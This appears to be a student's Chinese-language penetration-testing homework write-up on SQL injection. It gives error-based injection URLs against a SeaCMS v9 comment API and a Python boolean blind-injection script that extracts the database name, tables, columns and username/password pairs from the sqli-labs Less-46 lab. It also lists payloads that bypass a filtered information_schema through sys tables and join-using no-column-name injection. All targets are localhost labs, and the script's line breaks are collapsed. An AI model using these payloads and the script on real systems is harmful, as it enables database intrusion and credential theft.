渗透第二次作业

1、seacmsv9报错注入出管理员账号密码

注入漏洞的文件路径:seacmsv9.1\upload\comment\api\index.php

注入点：&$rlist

经源代码分析,可用以下语句注入，得到用户名：

http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20user()))),@`%27`

用以下语句注入出数据库名：

http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20database()))),@`%27`

用以下语句注入出表名：

http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%23%0atable_name%20from%23%0ainformation_schema.tables%20where%20table_schema%20=0x736561636d73%20limit%200,1))),@`%27`

结果注入失败

2、orderby的布尔盲注

布尔盲注：

import requests
from lxml import htmldef get_id_one(URL, paload):res = requests.get(url=URL, params=paload)tree = html.fromstring(res.content)id_one = tree.xpath('//table//tr[1]/td[1]/text()')[0].strip()return id_one# 获取数据库名
def database(URL):dataname = ""for i in range(1, 10):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),id,username) -- "}id_one = get_id_one(URL, paload)if id_one == "1":hight = midmid = (low + hight) // 2else:low = mid + 1mid = (low + hight) // 2dataname += chr(mid)print(dataname)# 获取表名
def table_name(URL):tables = ""for i in range(1, 40):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),id,username) -- "}id_one = get_id_one(URL, paload)if id_one == "1":low = mid + 1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2tables += chr(mid)print(tables)# 获取字段名
def column_name(URL):columns = ""for i in range(1, 25):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),id,username) -- "}id_one = get_id_one(URL, paload)if id_one == "1":low = mid + 1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2columns += chr(mid)print(columns)# 获取数据
def datas(URl):data = ""for i in range(1, 50):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),id,username) -- "}id_one = get_id_one(URL, paload)if id_one == "1":low = mid + 1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2data += chr(mid)print(data)if __name__ == '__main__':URL = "http://127.0.0.1/sqlilabs/Less-46/index.php"database(URL)table_name(URL)column_name(URL)datas(URL)

结果：

3、过滤information_schema，如何解决

如果information_schema被过滤掉了，该如何查询数据方法一：利用sys数据库查看所有数据库名：
SELECT DISTINCT table_schema FROM sys.schema_table_statistics;查看数据库中所有表名：
SELECT table_name FROM sys.schema_table_statistics WHERE table_schema = 'seacms';#sys.schema_auto_increment_columns 
#sys.schema_table_statistics_with_buffer
#mysql.innodb_table_stats
#mysql.innodb_table_index
#均可代替 information_schema方法二：无列名注入利用 join-using 注列名获取表名：
?id=-1' union select 1,2,group_concat(table_name)from sys.schema_auto_increment_columns where table_schema=database()--+获取字段名：
?id=-1' union select * from (select * from users as a join users as b)as c--+
?id=-1' union select * from (select * from users as a join users b using(id,username))c--+
?id=-1' union select * from (select * from users as a join users b using(id,username,password))c--+